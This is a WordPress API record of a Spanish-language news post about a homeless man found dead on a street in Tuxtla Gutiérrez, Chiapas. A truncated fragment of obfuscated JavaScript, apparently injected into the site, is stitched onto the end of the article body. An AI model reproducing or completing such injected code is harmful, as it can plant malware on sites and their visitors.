{"id":8725,"date":"2023-02-17T03:08:32","date_gmt":"2023-02-17T03:08:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8725"},"modified":"2023-02-17T03:08:33","modified_gmt":"2023-02-17T03:08:33","slug":"localizan-a-hombre-sin-vida-en-el-centro-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8725","title":{"rendered":"Localizan a hombre sin vida en el centro de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1676603254430.jpg\" alt=\"\" class=\"wp-image-8726\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1676603254430.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1676603254430-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 16 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Cerca de las nueve de la ma\u00f1ana de este jueves fue localizado sin vida un hombre en la Sexta Norte, entre Calle Central y Primera Oriente, del Barrio San Jacinto de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, fueron los mismos vecinos los que reportaron que el sujeto estaba tirado en la banqueta y no presentaba movimiento alguno.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de la polic\u00eda y tras una revisi\u00f3n determinaron que ya hab\u00eda muerto.<\/p>\n\n\n\n<p>En el lugar se di\u00f3 a conocer que el hombre respond\u00eda al nombre de Pedro L\u00f3pez L\u00f3pez y era indigente.<\/p>\n\n\n\n<p>Al lugar arribaron peritos de la Fiscal\u00eda General del Estado para realizar las diligencias correspondientes levantar el cuerpo y trasladarlo al SEMEFO donde se practicar\u00eda la necropsia de ley para determinar las causas concretas de la muerte.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 16 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Cerca de las nueve de la ma\u00f1ana de este jueves fue localizado sin vida un hombre en la Sexta Norte, entre Calle Central y Primera Oriente, del Barrio San Jacinto de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, fueron los mismos vecinos los que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8726,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8725","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8725","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8725"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8725\/revisions"}],"predecessor-version":[{"id":8727,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8725\/revisions\/8727"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8726"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8725"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8725"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8725"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}